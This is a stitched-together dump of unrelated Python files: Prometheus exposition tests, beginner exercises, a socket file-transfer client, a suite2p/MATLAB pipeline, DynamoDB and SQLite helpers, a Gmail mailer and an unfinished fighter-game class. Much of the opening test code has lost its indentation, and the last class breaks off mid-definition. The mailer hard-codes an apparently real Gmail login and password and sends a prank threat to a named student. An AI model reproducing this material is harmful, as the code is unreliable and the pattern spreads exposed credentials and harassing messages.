g = Gauge('gg', 'A gauge', registry=self.registry, multiprocess_mode='all')
g.set(17)
self.assertEqual(b'# HELP gg A gauge\n# TYPE gg gauge\ngg 17.0\n# EOF\n', generate_latest(self.registry))
def test_summary(self):
s = Summary('ss', 'A summary', ['a', 'b'], registry=self.registry)
s.labels('c', 'd').observe(17)
self.assertEqual(b"""# HELP ss A summary
# TYPE ss summary
ss_count{a="c",b="d"} 1.0
ss_sum{a="c",b="d"} 17.0
ss_created{a="c",b="d"} 123.456
# EOF
""", generate_latest(self.registry))
@unittest.skipIf(sys.version_info < (2, 7), "Test requires Python 2.7+.")
def test_histogram(self):
s = Histogram('hh', 'A histogram', registry=self.registry)
s.observe(0.05)
self.assertEqual(b"""# HELP hh A histogram
# TYPE hh histogram
hh_bucket{le="0.005"} 0.0
hh_bucket{le="0.01"} 0.0
hh_bucket{le="0.025"} 0.0
hh_bucket{le="0.05"} 1.0
hh_bucket{le="0.075"} 1.0
hh_bucket{le="0.1"} 1.0
hh_bucket{le="0.25"} 1.0
hh_bucket{le="0.5"} 1.0
hh_bucket{le="0.75"} 1.0
hh_bucket{le="1.0"} 1.0
hh_bucket{le="2.5"} 1.0
hh_bucket{le="5.0"} 1.0
hh_bucket{le="7.5"} 1.0
hh_bucket{le="10.0"} 1.0
hh_bucket{le="+Inf"} 1.0
hh_count 1.0
hh_sum 0.05
hh_created 123.456
# EOF
""", generate_latest(self.registry))
def test_histogram_exemplar(self):
class MyCollector(object):
def collect(self):
metric = Metric("hh", "help", 'histogram')
# This is not sane, but it covers all the cases.
metric.add_sample("hh_bucket", {"le": "1"}, 0, None, Exemplar({'a': 'b'}, 0.5))
metric.add_sample("hh_bucket", {"le": "2"}, 0, None, Exemplar({'le': '7'}, 0.5, 12))
metric.add_sample("hh_bucket", {"le": "3"}, 0, 123, Exemplar({'a': 'b'}, 2.5, 12))
metric.add_sample("hh_bucket", {"le": "4"}, 0, None, Exemplar({'a': '\n"\\'}, 3.5))
metric.add_sample("hh_bucket", {"le": "+Inf"}, 0, None, None)
yield metric
self.registry.register(MyCollector())
self.assertEqual(b"""# HELP hh help
# TYPE hh histogram
hh_bucket{le="1"} 0.0 # {a="b"} 0.5
hh_bucket{le="2"} 0.0 # {le="7"} 0.5 12
hh_bucket{le="3"} 0.0 123 # {a="b"} 2.5 12
hh_bucket{le="4"} 0.0 # {a="\\n\\"\\\\"} 3.5
hh_bucket{le="+Inf"} 0.0
# EOF
""", generate_latest(self.registry))
def test_nonhistogram_exemplar(self):
class MyCollector(object):
def collect(self):
metric = Metric("hh", "help", 'untyped')
# This is not sane, but it covers all the cases.
metric.add_sample("hh_bucket", {}, 0, None, Exemplar({'a': 'b'}, 0.5))
yield metric
self.registry.register(MyCollector())
with self.assertRaises(ValueError):
generate_latest(self.registry)
def test_nonhistogram_bucket_exemplar(self):
class MyCollector(object):
def collect(self):
metric = Metric("hh", "help", 'histogram')
# This is not sane, but it covers all the cases.
metric.add_sample("hh_count", {}, 0, None, Exemplar({'a': 'b'}, 0.5))
yield metric
self.registry.register(MyCollector())
with self.assertRaises(ValueError):
generate_latest(self.registry)
def test_gaugehistogram(self):
self.custom_collector(
GaugeHistogramMetricFamily('gh', 'help', buckets=[('1.0', 4), ('+Inf', (5))], gsum_value=7))
self.assertEqual(b"""# HELP gh help
# TYPE gh gaugehistogram
gh_bucket{le="1.0"} 4.0
gh_bucket{le="+Inf"} 5.0
gh_gcount 5.0
gh_gsum 7.0
# EOF
""", generate_latest(self.registry))
def test_info(self):
i = Info('ii', 'A info', ['a', 'b'], registry=self.registry)
i.labels('c', 'd').info({'foo': 'bar'})
self.assertEqual(b"""# HELP ii A info
# TYPE ii info
ii_info{a="c",b="d",foo="bar"} 1.0
# EOF
""", generate_latest(self.registry))
def test_enum(self):
i = Enum('ee', 'An enum', ['a', 'b'], registry=self.registry, states=['foo', 'bar'])
i.labels('c', 'd').state('bar')
self.assertEqual(b"""# HELP ee An enum
# TYPE ee stateset
ee{a="c",b="d",ee="foo"} 0.0
ee{a="c",b="d",ee="bar"} 1.0
# EOF
""", generate_latest(self.registry))
    def test_unicode(self):
        # Non-ASCII help text and label values are emitted UTF-8 encoded
        # (\u4500 encodes to the three bytes \xe4\x94\x80).
        c = Counter('cc', '\u4500', ['l'], registry=self.registry)
        c.labels('\u4500').inc()
        self.assertEqual(b"""# HELP cc \xe4\x94\x80
# TYPE cc counter
cc_total{l="\xe4\x94\x80"} 1.0
cc_created{l="\xe4\x94\x80"} 123.456
# EOF
""", generate_latest(self.registry))
    def test_escaping(self):
        # Help text and label values must escape backslash, newline and
        # double-quote in the exposition output.
        c = Counter('cc', 'A\ncount\\er\"', ['a'], registry=self.registry)
        c.labels('\\x\n"').inc(1)
        self.assertEqual(b"""# HELP cc A\\ncount\\\\er\\"
# TYPE cc counter
cc_total{a="\\\\x\\n\\""} 1.0
cc_created{a="\\\\x\\n\\""} 123.456
# EOF
""", generate_latest(self.registry))
def test_nonnumber(self):
class MyNumber(object):
def __repr__(self):
return "MyNumber(123)"
def __float__(self):
return 123.0
class MyCollector(object):
def collect(self):
metric = Metric("nonnumber", "Non number", 'untyped')
metric.add_sample("nonnumber", {}, MyNumber())
yield metric
self.registry.register(MyCollector())
self.assertEqual(b'# HELP nonnumber Non number\n# TYPE nonnumber unknown\nnonnumber 123.0\n# EOF\n',
generate_latest(self.registry))
    def test_timestamp(self):
        # int/float timestamps render verbatim; Timestamp(sec, nsec) renders
        # with exactly nine fractional digits.
        class MyCollector(object):
            def collect(self):
                metric = Metric("ts", "help", 'unknown')
                metric.add_sample("ts", {"foo": "a"}, 0, 123.456)
                metric.add_sample("ts", {"foo": "b"}, 0, -123.456)
                metric.add_sample("ts", {"foo": "c"}, 0, 123)
                metric.add_sample("ts", {"foo": "d"}, 0, Timestamp(123, 456000000))
                metric.add_sample("ts", {"foo": "e"}, 0, Timestamp(123, 456000))
                metric.add_sample("ts", {"foo": "f"}, 0, Timestamp(123, 456))
                yield metric
        self.registry.register(MyCollector())
        self.assertEqual(b"""# HELP ts help
# TYPE ts unknown
ts{foo="a"} 0.0 123.456
ts{foo="b"} 0.0 -123.456
ts{foo="c"} 0.0 123
ts{foo="d"} 0.0 123.456000000
ts{foo="e"} 0.0 123.000456000
ts{foo="f"} 0.0 123.000000456
# EOF
""", generate_latest(self.registry))
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
|
def sumar(lista):
    """Return the sum of the numbers in *lista* (0 for an empty list).

    Replaces the recursive slice-based version: builtin sum() is O(n),
    allocates no per-call sublists, and cannot hit the recursion limit
    on long inputs.
    """
    return sum(lista)


print(sumar([1, 2, 3, 4]))
|
import unittest
from unittest.mock import patch
from app.deliver import deliver
from app.meta_wrapper import MetaWrapper
from app.output_type import OutputType
class TestDeliver(unittest.TestCase):
    """deliver() stores the (possibly encrypted) payload, then sends a message
    naming the bucket path it was written to."""

    @patch('app.deliver.encrypt_output')
    @patch('app.deliver.write_to_bucket')
    @patch('app.deliver.send_message')
    def test_deliver(self, mock_send_message, mock_write_to_bucket, mock_encrypt_output):
        bucket_path = "dap/"
        tx_id = "9010576d-f3df-4011-aa41-adecd9bee011"
        meta_data = MetaWrapper(tx_id)
        mock_encrypt_output.return_value = "This has been encrypted"
        mock_write_to_bucket.return_value = bucket_path

        deliver(meta_data, b"bytes")

        mock_send_message.assert_called_with(meta_data, bucket_path)

    @patch('app.deliver.write_to_bucket')
    @patch('app.deliver.send_message')
    def test_deliver_seft(self, mock_send_message, mock_write_to_bucket):
        """SEFT submissions skip the encryption step but notify identically."""
        bucket_path = "dap/"
        meta_data = MetaWrapper("9010576d-f3df-4011-aa41-adecd9bee011")
        meta_data.output_type = OutputType.SEFT
        mock_write_to_bucket.return_value = bucket_path

        deliver(meta_data, b"bytes")

        mock_send_message.assert_called_with(meta_data, bucket_path)
|
#!/usr/bin/env python
import sys
import os
#sys.path.insert(0, '/home/mossing/code/adesnal')
import run_pipeline_tiffs as rpt
import read_exptlist as re
import numpy as np
# Root folders for the MATLAB .mat outputs and the suite2p results tree.
matfile_fold = '/home/mossing/modulation/matfiles/'
suite2p_fold = '/home/mossing/data1/suite2P/results/'
def save_meanImg(datafold, nplanes=4):
    """Export the mean-image arrays from each plane's suite2p ops.npy.

    Parameters
    ----------
    datafold : str
        Session folder containing a 'suite2p/plane<i>/' hierarchy.
    nplanes : int, optional
        Number of imaging planes to scan. Previously hard-coded to 4;
        the default keeps existing callers working unchanged.

    Each variable found in ops is written next to ops.npy as '<var>.npy';
    missing variables are reported on stdout.
    """
    vars_of_interest = ['meanImg', 'meanImgE', 'meanImg_chan2', 'meanImg_chan2_corrected']
    planefolds = [datafold + '/suite2p/plane%d/' % iplane for iplane in range(nplanes)]
    for fold in planefolds:
        # ops.npy holds a 0-d object array; [()] unwraps the dict inside it.
        ops = np.load(fold + 'ops.npy', allow_pickle=True)[()]
        for var in vars_of_interest:
            if var in ops:
                np.save(fold + var + '.npy', ops[var])
            else:
                # Report which expected image is absent from this plane.
                print(var)
def run(exptfilename):
    """For each experiment listed in *exptfilename*: export mean images from
    the suite2p results folder, then launch the MATLAB ROI-correction script.
    """
    foldname = []
    filenames = []
    foldname,filenames = re.read_exptlist(exptfilename,lines_per_expt=3,fileline=1)
    # for i in range(len(foldname)):
    # # do matlab stuff to save cropping rectangles
    # print('now saving a cropping rectangle for ' + foldname[i])
    for i in range(len(foldname)):
        # foldname entries look like '<date>/<animalid>'.
        fileparts = foldname[i].split('/')
        date = fileparts[0]
        animalid = fileparts[1]
        # Session subfolder is the underscore-joined list of experiment ids.
        expt_ids = [str(x) for x in filenames[i]]
        subfold = '_'.join(expt_ids)
        thisfold = suite2p_fold + animalid + '/' + date + '/' + subfold + '/'
        save_meanImg(thisfold)
        # Quote the whole -r payload so the shell passes it to MATLAB intact.
        matlab_cmd = '"' + "s2p_output_to_opto_corrected_rois('" + thisfold + "','datafold','" + matfile_fold + "'); exit;" + '"'
        print(matlab_cmd)
        os.system('matlab -r ' + matlab_cmd)
if __name__ == "__main__":
    # Usage: <script> <experiment-list-file>
    run(sys.argv[1])
|
"""
A function g(n) is defined by:
g(n) = n if n < 3, and g(n) = g(n-1) + 2*g(n-2) + 3*g(n-3) if n >= 3
Write a recursive implementation of g(n) called g_recursive(n).
Write an iterative implementation of g(n) called g_iterative(n).
"""
def g_recursive(n):
    """Recursive implementation of g.

    g(n) = n for n < 3, otherwise g(n-1) + 2*g(n-2) + 3*g(n-3).
    The argument is coerced to float, so results are always floats.
    """
    n = float(n)
    if n >= 3:
        return g_recursive(n - 1) + 2 * g_recursive(n - 2) + 3 * g_recursive(n - 3)
    return n
def g_iterative(n):
    """Iterative implementation of g.

    g(n) = n for n < 3, otherwise g(n-1) + 2*g(n-2) + 3*g(n-3).

    BUG FIX: the previous version returned wrong values for most inputs
    (e.g. g_iterative(6) gave 47; the correct value is 59). This version
    runs the recurrence bottom-up from the three base values below 3.
    The argument is coerced to float to match g_recursive exactly.
    """
    n = float(n)
    if n < 3:
        return n
    # Number of times the recurrence must be applied to climb from the
    # largest base value (n - steps, which is < 3) up to n itself.
    steps = int(n - 3) + 1
    # Rolling window of the three most recent values: g(m-2), g(m-1), g(m).
    a, b, c = n - steps - 2, n - steps - 1, n - steps
    for _ in range(steps):
        a, b, c = b, c, c + 2 * b + 3 * a
    return c
# TEST
import unittest
class TestFunctions(unittest.TestCase):
    """Checks both implementations of g against hand-computed values."""

    def test_recursive(self):
        self.assertEqual(g_recursive(0), 0)
        self.assertEqual(g_recursive(5), 25)
        self.assertEqual(g_recursive(10), 1892)
        # Float arithmetic: 2.14 + 2*1.14 + 3*0.14 is only approximately
        # 4.84, so exact assertEqual would fail.
        self.assertAlmostEqual(g_recursive(3.14), 4.84)

    def test_iterative(self):
        self.assertEqual(g_iterative(0), 0)
        self.assertEqual(g_iterative(5), 25)
        # BUG FIX: this line previously called g_recursive, so
        # g_iterative(10) was never actually exercised.
        self.assertEqual(g_iterative(10), 1892)
        self.assertAlmostEqual(g_iterative(3.14), 4.84)
if __name__ == '__main__':
    # Run the embedded tests when executed directly.
    unittest.main()
|
def extend(perm, n):
    """Print every permutation of range(n) by backtracking.

    *perm* is the partial permutation built so far; each complete
    permutation is printed prefixed with '-----'.
    """
    if len(perm) == n:
        print('-----', perm)
        # FIX: a complete permutation cannot be extended — previously the
        # code fell through and scanned all n candidates for nothing.
        return
    for k in range(n):
        if k not in perm:
            perm.append(k)
            extend(perm, n)
            perm.pop()  # undo the choice before trying the next candidate


extend(perm=[], n=4)
# Minecraft Overviewer render configuration.
# NOTE(review): worlds, renders, outputdir, smooth_lighting and
# nether_smooth_lighting are injected by Overviewer's config loader —
# this file is not standalone Python.
worlds["Lukin Server"] = "/var/in"

renders["Overworld"] = {
    "world": "Lukin Server",
    "title": "Overworld",
    "rendermode": smooth_lighting,
    "dimension": "overworld",
}

renders["Nether"] = {
    "world": "Lukin Server",
    "title": "Nether",
    "rendermode": nether_smooth_lighting,
    "dimension": "nether",
}

outputdir = "/var/out"
|
# NOTE(review): raw_input() is Python 2 only; under Python 3 this raises
# NameError at runtime (use input()).
print("Enter 'x' for exit.")
string = raw_input("Enter any string to remove all vowels from it: ")
# NOTE(review): the 'x' exit option advertised above is never handled.
newstr = string;
print("\nRemoving vowels from the given string...");
#vowels = ('a', 'e', 'i', 'o', 'u');
# Only lowercase vowels are stripped; uppercase vowels survive.
for x in string:
    if x=='a' or x=='e' or x=='i' or x=='o' or x=='u':
        newstr = newstr.replace(x,"");
print("New string after successfully removed all the vowels:");
print(newstr);
|
import socket
import os
from Enigma import Enigma
# Client can send and recive files to and from server
# Encryption and Decryption only work on TEXT FILES !
def Recv_File(s):
    """Download a file from the server over socket *s*.

    Protocol: send the requested name; the server answers "EXISTS<size>"
    when available. After the user confirms with 'Y' we ack with "OK" and
    the file arrives in 1024-byte chunks, saved as 'new_<filename>'.
    Entering 'q' skips the transfer; the socket is closed either way.
    """
    filename = input("ENTER FILE NAME : ")
    if filename != 'q':
        #print("this far")
        s.send(filename.encode())
        #print("this far")
        data = s.recv(1024)
        #print(data[:6])
        #print("this far")
        if data[:6].decode() == "EXISTS":
            #print("this far4")
            # The byte size follows immediately after the "EXISTS" marker.
            filesize = int(data[6:])
            message = input(f"File EXISTS {filesize} bytes do you want to DOWNLOAD (Y/N) ")
            if message == 'Y':
                s.send('OK'.encode())
                # NOTE(review): handle is never closed explicitly; a
                # with-block would be safer.
                f = open('new_' + filename,'wb')
                data = s.recv(1024)
                total_recv = len(data)
                #print("Data now is" + data.decode())
                f.write(data)
                while total_recv < filesize:
                    data = s.recv(1024)
                    total_recv += len(data)
                    #print("IN loop Data now is" + data.decode())
                    f.write(data)
                    progress = total_recv/float(filesize)*100
                    print(f"Progress {progress} % Done")
                print("DOWNLOAD COMPLETE")
            else: print("Exiting ...")
        else:
            print("FILE DOES NOT EXIST")
    s.close()
def Send_File(sock):
    """Upload a local file to the server over *sock*.

    Sends the name; if the file exists locally, announces "EXISTS<size>",
    waits for the receiver's "OK", then streams the file in 1024-byte
    chunks. The socket is closed on every path.
    """
    filename = input("Enter file NAME: ")
    sock.send(filename.encode())
    if os.path.isfile(filename):
        print("File EXISTS")
        sock.send(("EXISTS" + str(os.path.getsize(filename))).encode())
        user_response = sock.recv(1024)
        if user_response[:2].decode() == 'OK':
            #print("this far")
            with open(filename,'rb') as f:
                #print("this far1")
                bytes_to_send = f.read(1024)
                sock.send(bytes_to_send)
                # An empty read means EOF; the final zero-length send ends
                # the loop (and signals completion to the peer).
                while bytes_to_send != "".encode():
                    #print("this far2")
                    bytes_to_send = f.read(1024)
                    #print(bytes_to_send)
                    sock.send(bytes_to_send)
            print("FILE SENT!")
        else:
            print("Error user_response not ok");
        sock.close()
    else:
        print("File does not EXIST")
        sock.send("FILE DOES NOT EXIST".encode())
        sock.close();
def Encrypt():
    """Encrypt a local text file with the Enigma module into 'enc<filename>'.

    Prompts for the three rotor positions (digits 0-3) and a file name.
    FIX: previously a missing file only printed a warning and then hit a
    NameError on LineString; we now return early. File handles are also
    closed deterministically via with-blocks.
    """
    disks = input("Enter disks position Must be from 0-3 d1[] d2[] d3[] \n Like this '012 or 212 or 000' : ") #enter like 000/012/222/333/011
    filename = input("Enter file name: ")
    while len(disks)>3:
        disks = input("Enter disks position 0-3 d1[] d2[] d3[] : ")
    if not os.path.isfile(filename):
        print("File does not exist !")
        return
    with open(filename, "r") as f:
        LineString = f.read()
    # Append mode: repeated runs add to, rather than clobber, the output.
    with open("enc" + filename, "a") as f:
        f.write(Enigma.encrypt(0, int(disks[0]), int(disks[1]), int(disks[2]), LineString))
def Decrypt():
    """Decrypt a local text file with the Enigma module into 'dec<filename>'.

    FIX: previously a missing file only printed a warning and then hit a
    NameError on LineString, and the output file was never closed; both
    are fixed (early return + with-blocks).
    """
    disks = input("Enter disks position 0-3 d1[] d2[] d3[] \n Like this '012 or 212 or 000' : ")
    filename = input("Enter file name: ")
    while len(disks)>3:
        disks = input("Enter disks position 0-3 d1[] d2[] d3[] : ")
    if not os.path.isfile(filename):
        print("File does not exist !")
        return
    with open(filename, "r") as f:
        LineString = f.read()
    with open("dec" + filename, "a") as f:
        # NOTE(review): the original comment asked whether decrypt takes one
        # more parameter — verify against Enigma.decrypt's signature.
        f.write(Enigma.decrypt(0, int(disks[0]), int(disks[1]), int(disks[2]), LineString))
def Main():
    """Connect to the server, read the menu, and dispatch the user's choice.

    Choices: 1 = upload a file, 2 = download a file, 3/4 = purely local
    Enigma encrypt/decrypt (no further server interaction).
    """
    host = '127.0.0.1' #put server ip here/ currently set up for local testing
    port = 5000
    s = socket.socket()
    s.connect((host,port))
    #print("CONNECTED to" + str(s))
    # Server's greeting / menu text.
    print(s.recv(1024).decode())
    choice = input("Enter your choice ")
    s.send(choice.encode())
    #print("thisfar0")
    if choice == "1":
        #print("thisfar1")
        print(s.recv(1024).decode())
        Send_File(s)
    elif choice == "2":
        print(s.recv(1024).decode())
        Recv_File(s)
    elif choice == "3":
        Encrypt()
    elif choice == "4":
        Decrypt()
    else:
        print("Choice error !")
    s.close()
if __name__ == '__main__':
    # Client entry point; requires the matching server on 127.0.0.1:5000.
    Main()
|
import datetime

print(" age calculator ")
birth_year = int(input("Enter your year of birth: \n"))
birth_month = int(input("Enter your month of birth: \n"))
birth_day = int(input("Enter your day of birth: \n"))
today = datetime.date.today()
# FIX: the previous abs() arithmetic gave wrong months/days whenever the
# birthday had not yet occurred this month or year; use borrow arithmetic.
age_year = today.year - birth_year
age_month = today.month - birth_month
age_day = today.day - birth_day
if age_day < 0:
    # Borrow the length of the month preceding the current one.
    first_of_month = today.replace(day=1)
    days_in_prev_month = (first_of_month - datetime.timedelta(days=1)).day
    age_day += days_in_prev_month
    age_month -= 1
if age_month < 0:
    age_month += 12
    age_year -= 1
print("Your exact age is: ", age_year, "Years", age_month, "months and", age_day, "days")
|
#!/usr/bin/env python
import asyncio
import websockets
import json
from time import sleep
async def hello(uri):
    """Open a websocket to *uri*, send one greeting, and disconnect."""
    async with websockets.connect(uri) as websocket:
        await websocket.send("Hello world!")
async def test2(uri):
    """Send a message and print the 'desc' field of the JSON reply."""
    async with websockets.connect(uri) as websocket:
        await websocket.send("Here is fun!")
        greeting = await websocket.recv()
        # Replies are JSON objects; 'desc' carries the display text.
        greeting = json.loads(greeting)
        print("greeting " + greeting['desc'])
async def longwait(uri):
    """Ping the server every 2 seconds over one long-lived connection,
    printing the 'desc' field of each JSON reply."""
    async with websockets.connect(uri) as ws:
        while True:
            # going to have to use if statements and JSON objects to determine
            # what kind of event because I can't make custom events with this
            # client library ugh
            # FIX: time.sleep() blocks the whole event loop (stalling the
            # websocket heartbeat); asyncio.sleep yields control instead.
            await asyncio.sleep(2)
            await ws.send("Hello world!")
            greeting = await ws.recv()
            greeting = json.loads(greeting)
            print("greeting " + greeting['desc'])
    print("Outside the loop")
# asyncio.get_event_loop().run_until_complete(
# hello('ws://socketio-tutorial-dgoodman.c9users.io:80'))
# asyncio.get_event_loop().run_until_complete(
# test2('ws://socketio-tutorial-dgoodman.c9users.io:80')
# )
# So since this is async now I think we might just make one master connection and have the events triggered inside
# Run the long-lived client until it exits (it loops forever).
# NOTE(review): asyncio.get_event_loop() is deprecated for this use in
# modern Python — asyncio.run(longwait(...)) is the current idiom.
asyncio.get_event_loop().run_until_complete(
    longwait('ws://socketio-tutorial-dgoodman.c9users.io:80')
)
print("done!")
|
# Read n integers from the user, sort them descending, and print them.
# Any non-integer entry restarts the whole prompt loop.
while True :
    try:
        n = int(input("Tentukan banyak bilangan n = "))
        nlist = []
        for i in range(n):
            print('')
            print('n ke',i+1)
            x = int(input("Masukkan nilai n = "))
            nlist.append(x)
        print('')
        # Largest first.
        nlist.sort(reverse=True)
        print('n =',nlist)
        break
    except ValueError:
        print("Input harus integer")
        continue
class DynamoDB:
    """Thin convenience wrapper around a DynamoDB client
    (a pyboto3.dynamodb-style object, per the original type note)."""

    def __init__(self, client):
        # Underlying low-level client; all methods delegate to it.
        self._client = client

    def create_table(self, table, attribute_definitions, key_schema, iops):
        """Create *table* with the given schema and provisioned throughput."""
        print("Creating DynamoDB table...")
        params = {
            'TableName': table,
            'AttributeDefinitions': attribute_definitions,
            'KeySchema': key_schema,
            'ProvisionedThroughput': iops,
        }
        return self._client.create_table(**params)

    def describe_table(self, table):
        """Return the service's description of *table*."""
        print("Describing DynamoDB table with name " + table)
        return self._client.describe_table(TableName=table)

    def update_read_write_capacity(self, table_name, new_read_capacity, new_write_capacity):
        """Re-provision read/write capacity units for *table_name*."""
        print("Updating Provisioned Throughput of table with name " + table_name)
        throughput = {
            'ReadCapacityUnits': new_read_capacity,
            'WriteCapacityUnits': new_write_capacity,
        }
        return self._client.update_table(TableName=table_name,
                                         ProvisionedThroughput=throughput)

    def delete_table_with_name(self, table_name):
        """Drop *table_name* entirely."""
        print("Deleting DynamoDB table with name " + table_name)
        return self._client.delete_table(TableName=table_name)
"""SQL queries that answer the story questions about cities and cost of living
in Germany. Note: the tables.db file needs to be in the same location as this
python file in order for it to run correctly."""
import sqlite3
from os import linesep
def get_top_density_low_cost(c):
    """select the five cities with the highest density, that have a single
    person cost of living under 750 euro a month. Return fields: cities,
    density, and single person cost"""
    # 'with c:' wraps the query in a transaction on the connection.
    with c:
        cursor = c.cursor()
        cursor.execute(
            'SELECT wiki.city, density_km2, single_person '
            'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
            'WHERE single_person < 750 '
            'ORDER BY density_km2 DESC '
            'LIMIT 5')
        return cursor.fetchall()
def get_highest_family_cost(c):
    """select the city with the highest monthly living cost for a family of
    four where the density is < 1500 people per square km.
    Return fields: city and cost"""
    with c:
        cursor = c.cursor()
        # MAX() collapses the join to the single most expensive row.
        cursor.execute(
            'SELECT wiki.city, MAX(family_of_four) '
            'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
            'WHERE density_km2 < 1500')
        return cursor.fetchall()
def get_lowest_single_cost(c):
    """select the city with the lowest monthly living cost for a single person
    and a population over 300,000. Return fields: city and cost.

    NOTE(review): the original docstring promised population as well, but the
    query selects only city and MIN(single_person) — the caller formats
    exactly two fields, so the query is the intended behaviour."""
    with c:
        cursor = c.cursor()
        cursor.execute(
            'SELECT wiki.city, MIN(single_person) '
            'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
            'WHERE population > 300000')
        return cursor.fetchall()
def get_total_area(c):
    """Return the total area in km2 of all the cities we collected."""
    with c:
        cursor = c.cursor()
        cursor.execute('SELECT SUM(area_km2) FROM wiki')
        # Single row, single column: unwrap the scalar directly.
        return cursor.fetchone()[0]
def get_avg_family_cost(c):
    """Return the average monthly living cost for a family of four."""
    query = 'SELECT AVG(family_of_four) FROM numbeo'
    with c:
        cursor = c.cursor()
        cursor.execute(query)
        # AVG() yields one row with one value: unwrap the scalar.
        return cursor.fetchone()[0]
def get_avg_single_cost(c):
    """Return the average monthly living cost for a single person."""
    query = 'SELECT AVG(single_person) FROM numbeo'
    with c:
        cursor = c.cursor()
        cursor.execute(query)
        # AVG() yields one row with one value: unwrap the scalar.
        return cursor.fetchone()[0]
def get_avg_sg_cost_NRW(c):
    """select the average monthly living cost for a single person in the state
    of North Rhine-Westphalia"""
    with c:
        cursor = c.cursor()
        cursor.execute(
            'SELECT AVG(single_person) '
            'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
            'WHERE state="North Rhine-Westphalia"')
        # this returns a tuple in a list, so let's index in to get the number
        return cursor.fetchall()[0][0]
def get_avg_fam_cost_NRW(c):
    """select the average monthly living cost for a FAMILY OF FOUR in the
    state of North Rhine-Westphalia.

    (The original docstring said 'single person' — a copy-paste slip; the
    query aggregates family_of_four, matching the function name.)"""
    with c:
        cursor = c.cursor()
        cursor.execute(
            'SELECT AVG(family_of_four) '
            'FROM wiki LEFT OUTER JOIN numbeo ON numbeo.City = wiki.City '
            'WHERE state="North Rhine-Westphalia"')
        # this returns a tuple in a list, so let's index in to get the number
        return cursor.fetchall()[0][0]
if __name__ == '__main__':
    # NOTE(review): the module docstring says the file is 'tables.db', but
    # this connects to 'tables' — confirm which name ships with the project.
    c = sqlite3.connect('tables')
    top_5 = get_top_density_low_cost(c)
    # Keep only the city names (first field of each row).
    top_5_cities = [data[0] for data in top_5]
    max_cost = get_highest_family_cost(c)
    min_cost = get_lowest_single_cost(c)
    total_area = get_total_area(c)
    avg_fam_cost = get_avg_family_cost(c)
    avg_fam_NRW_cost = get_avg_fam_cost_NRW(c)
    avg_sg_cost = get_avg_single_cost(c)
    avg_sg_NRW_cost = get_avg_sg_cost_NRW(c)
    print("Five highest density cities that have a cost of living below 750"
          "euro per month for a single person:")
    print(", ".join(top_5_cities), linesep)
    print("City with the highest monthly cost of living for a family of four "
          "and density below 1500 people per square km:")
    # max_cost[0] is a (city, cost) row; it feeds the two %s placeholders.
    print("%s. Cost in euro: %s" % max_cost[0], linesep)
    print("City with the lowest monthly cost of living for a single person "
          "and population over 300,000:")
    print("%s. Cost in euro: %s" % min_cost[0], linesep)
    print("Total area of the cities in our database in square kilometres:")
    print("%.2f" % total_area, linesep)
    print("Average monthly family cost in euro: %.2f" % avg_fam_cost)
    print("Average monthly family person cost in euro in NRW: %.2f" %
          avg_fam_NRW_cost)
    print("Average monthly single person cost in euro: %.2f" % avg_sg_cost)
    print("Average monthly single person cost in euro in NRW: %.2f" %
          avg_sg_NRW_cost)
|
import smtplib

# NOTE(review): real credentials are hard-coded and committed here — rotate
# them and load from an environment variable or secrets store instead.
gmail_user = 'moffel.piertje420@gmail.com'
gmail_password = 'Welkom01!'

sent_from = 'Karbonkel@student.hu.nl'
to = ['mauro.bijvank@student.hu.nl']
subject = 'Karbonkel ziet dat jij de verkeerde RFID-tag gebruikt!'
body = "Karbonkel steelt je schoenen vannacht!!\n\n- Karbonkel"

# Minimal RFC-822-style message assembled by hand.
email_text = """\
From: %s
To: %s
Subject: %s
%s
""" % (sent_from, ", ".join(to), subject, body)

try:
    server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
    server.ehlo()
    server.login(gmail_user, gmail_password)
    server.sendmail(sent_from, to, email_text)
    server.close()
    print( 'Email sent!')
# FIX: a bare 'except:' also swallowed SystemExit/KeyboardInterrupt;
# catch Exception so deliberate interrupts still propagate.
except Exception:
    print( 'Something went wrong...')
import random
class Lutador:
    """A fighter: name, weight (kg), strength, 'ginga' (agility) and martial art."""

    def __init__(self, nome, peso, forca , ginga, arteMarcial="MMA"):  # ginga: also called agility or dexterity by laypeople
        # NOTE(review): on validation failure these branches only print and
        # return, leaving the instance without any attributes (later access
        # raises AttributeError). Raising TypeError would be stricter, but the
        # demo code below relies on this print-and-continue behaviour.
        if (not( isinstance(nome, str))):
            print("Atributo nome tem que ser do tipo string.")
            return None
        if (not( isinstance(peso, int ) or isinstance(peso, float ))):
            print("Atributo peso tem que ser do tipo int ou float.")
            return None
        if (not( isinstance(forca, int))):
            print("Atributo forca tem que ser do tipo int.")
            return None
        if (not( isinstance(ginga, int))):
            print("Atributo ginga tem que ser do tipo int.")
            return None
        if (not( isinstance(arteMarcial, str))):
            print("Atributo arteMarcial tem que ser do tipo string.")
            return None
        self.nome = nome
        self.peso = peso
        self.forca = forca
        self.arteMarcial = arteMarcial
        self.ginga = ginga
        # Per-fight results accumulate here as ['vitoria'] / ['derrota'] entries.
        self.historicoDeLutas = []

    def __repr__(self):
        return f'Pesando incríveis {self.peso} kilos, com uma inacreditável força de {self.forca}, uma ginga invejável de {self.ginga} , mestre em {self.arteMarcial}. O inigualável Luuutador {self.nome}!!! '

    def atualizaHistorico(self,resultadoLuta):
        # Append the result (a one-element list) to the fight history.
        self.historicoDeLutas += [resultadoLuta]
class Luta:
    """A bout between two Lutador instances of comparable weight."""

    def __init__(self, lutador1, lutador2):
        # NOTE(review): like Lutador, invalid input prints and returns,
        # leaving the instance without lutador1/lutador2 attributes.
        if(not( isinstance(lutador1,Lutador) and isinstance(lutador2,Lutador))):
            print("Atributos da classe Luta devem pertencer a classe Lutador")
            return None
        # Fighters may differ by at most 6 kg.
        diferncaPeso = abs(lutador1.peso - lutador2.peso)
        if( diferncaPeso > 6 ):
            print("Lutadores não podem ter pesos muito diferentes")
            return None
        self.lutador1 = lutador1
        self.lutador2 = lutador2

    def __repr__(self):
        return f'O grande comfronto de {self.lutador1.nome} contra {self.lutador2.nome}!'

    def informacoes(self):
